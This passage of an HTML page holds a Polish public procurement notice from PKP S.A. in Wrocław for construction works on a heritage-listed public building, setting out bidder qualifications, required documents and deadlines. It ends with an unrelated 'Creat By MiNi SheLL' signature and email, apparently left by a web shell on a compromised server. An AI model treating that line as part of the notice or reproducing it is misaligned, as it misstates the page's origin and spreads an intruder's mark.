1. Szczegóły dotyczące projektowanych rozwiązań zostaną przedstawione w przedmiarach robót i specyfikacjach technicznych wykonania i odbioru robót budowlanych, które stanowić będą integralną część opracowania i podstawę do wyceny robót budowlanych.
2. Wszystkie prace winny być wykonywane pod stałym nadzorem osoby o odpowiednich kwalifikacjach i posiadającej stosowne uprawnienia. Pracownicy wykonujący roboty na wysokości winni mieć aktualne badania lekarskie dopuszczające do pracy na wysokości. Powinni także przejść stosowne szkolenie BHP i p. poż. oraz być zaopatrzonymi w odpowiedni sprzęt z aktualnymi atestami.
3. W przypadku stwierdzenia niezgodności stanu rzeczywistego z przyjętymi przez autorów założeniami należy niezwłocznie wezwać autorów celem dokonania stosownych uzgodnień.
4. Zgodnie z art. 36 prawa budowlanego dopuszcza się wprowadzenia zmian do projektu budowlanego, o ile nie będą one naruszały postanowień tego artykułu.
5. Kierownik budowy jest zobowiązany do zapewnienia sporządzenia Planu Bezpieczeństwa i Ochrony Zdrowia /zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 27.08.2002 - Dz. U. z dnia 17.09.2002/..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.45.41.00-5, 45.30.00.00-0, 45.40.00.00-1, 45.11.00.00-1, 45.11.12.00-0, 45.11.12.20-6, 45.11.12.91-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 90 000 PLN słownie: dziewięćdziesiąt tysięcy PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej dwa  zamówienia polegające na realizacji robót budowlano-montażowych, na obiekcie budowlanym w postaci budynku użyteczności publicznej w rozumieniu przepisów  rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.nr 75 poz. 690 ze zm.)  o kubaturze nie mniejszej niż   11 431m3  wyposażonym, co najmniej w instalacje i systemy łącznie: instalacje sanitarne (w tym co najmniej: wod-kan, c.o. ccw. wentylacja i oddymianie), sieci i instalacje teletechniczne, łączność telefonii kablowej, dźwiękowy system ostrzegawczy, instalacja monitoringu wizyjnego, instalacja przeciwpożarowa, instalacja wentylacji mechanicznej i oddymiania, sieci i instalacje elektryczne i elektroenergetyczne o łącznej wartości  robót budowlano-montażowych na obiekcie wpisanym do ewidencji zabytków nie mniejszej niż  3 000.000 złotych brutto lub równowartość w innych walutach, 
oraz   jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej dwa  zamówienia polegające na realizacji robót budowlano-montażowych na obiekcie wpisanym ewidencji  zabytków o wartości robót budowlano-montażowych nie mniejszej niż
  3 000.000 PLN brutto lub równowartość w innych walutach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować Personelem do wykonania 
przedmiotu  Zamówienia , który  składa się na kluczowy zespół ekspertów, zgodnie z poniższym wyszczególnieniem:
Eksperci:

Kierownik Budowy powinien posiadać wyższe wykształcenie techniczne, przynajmniej 5-letnie doświadczenie na stanowiskach kierowniczych, przy realizacji robót budowlano-montażowych na obiekcie użyteczności publicznej w rozumieniu przepisów  rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.nr 75 poz. 690 ze zm.), a także uprawnienia do kierowania budową i robotami oraz nadzorowania i kontrolowania robót w specjalności konstrukcyjno - budowlanej bez ograniczeń zgodnie z wymaganiami ustawy Prawo budowlane (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118, z późn. zmianami) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa oraz zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001, Nr 5, poz. 42 ze zm.) łącznie z uprawnieniami do wykonywania nadzoru inwestorskiego przy zabytkach nieruchomych - określonymi w Rozporządzeniu Ministra Kultury z dnia 9 czerwca 2004r. (Dz.U. z 2004r. Nr 150 poz. 1579) oraz praca przy co najmniej 2-ch obiektach budowlanych  wpisanych do ewidencji zabytków.

Specjalista ds. wycen kosztorysowych i rozliczenia rzeczowo - finansowego inwestycji oraz przygotowania raportów okresowych, powinien posiadać wyższe wykształcenie oraz 3-letnie doświadczenie w przygotowywaniu i weryfikacji kosztorysów oraz znajomość rozliczeń rzeczowo - finansowych inwestycji budowlanych.

Specjalista ds. geodezji - powinien posiadać co najmniej średnie wykształcenie na odpowiednim kierunku, uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji w zakresie geodezyjnej obsługi inwestycji jak też geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i  inwentaryzacyjnych oraz co najmniej 3-letnie doświadczenie zawodowe

Specjalista ds. geotechniki - powinien posiadać wyższe wykształcenie na odpowiednim kierunku, stwierdzone kwalifikacje do wykonywania i kierowania pracami geologicznymi w zakresie ustalania warunków geologiczno-inżynierskich dla potrzeb zagospodarowania przestrzennego i posadawiania obiektów budowlanych, z wyłączeniem posadawiania obiektów budowlanych zakładów górniczych oraz budownictwa wodnego oraz co najmniej 3-letnie doświadczenie zawodowe. 

Specjalista ds. obmiarów i odbiorów dostaw materiałów, prefabrykatów i urządzeń - powinien posiadać wyższe wykształcenie i  co najmniej 3- letnie doświadczenie zawodowe w wykonywaniu obmiarów i odbiorów dostaw materiałów, prefabrykatów i urządzeń

Specjalista ds. systemów bezpieczeństwa (np. kontroli dostępu, sygnalizacji włamania, sygnalizacji pożaru, nagłośnienia awaryjnego i informacyjnego,...) - powinien mieć co najmniej średnie wykształcenie techniczne i co najmniej 3 letnie doświadczenie zawodowe w budowie systemów bezpieczeństwa.

Rzeczoznawca ds. zabezpieczeń przeciwpożarowych
Rzeczoznawca ds. konstrukcyjno - budowlanych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać średniorocznie co najmniej 15 zatrudnionych  pracowników, w tym 5 osób personelu kierowniczego, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać średniorocznie co najmniej 15 zatrudnionych  pracowników, w tym 5 osób personelu kierowniczego, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 3 000 000 złotych lub równowartość w innych walutach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pkp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pkp.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2012 godzina 10:30, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego 
PKP S.A. Oddział Gospodarowania Nieruchomościami we Wrocławiu, ul. Joannitów 13, 50-525 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Józef Wojnarowicz pokój 318, tel. 71 717 1104, email: j.wojnarowicz@pkp.pl
Marcin Janiszewski pokój 318, Tel. 71 717 1104, email: marcin.janiszewski@pkp.pl 
w godzinach od 8:00 do 14:00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com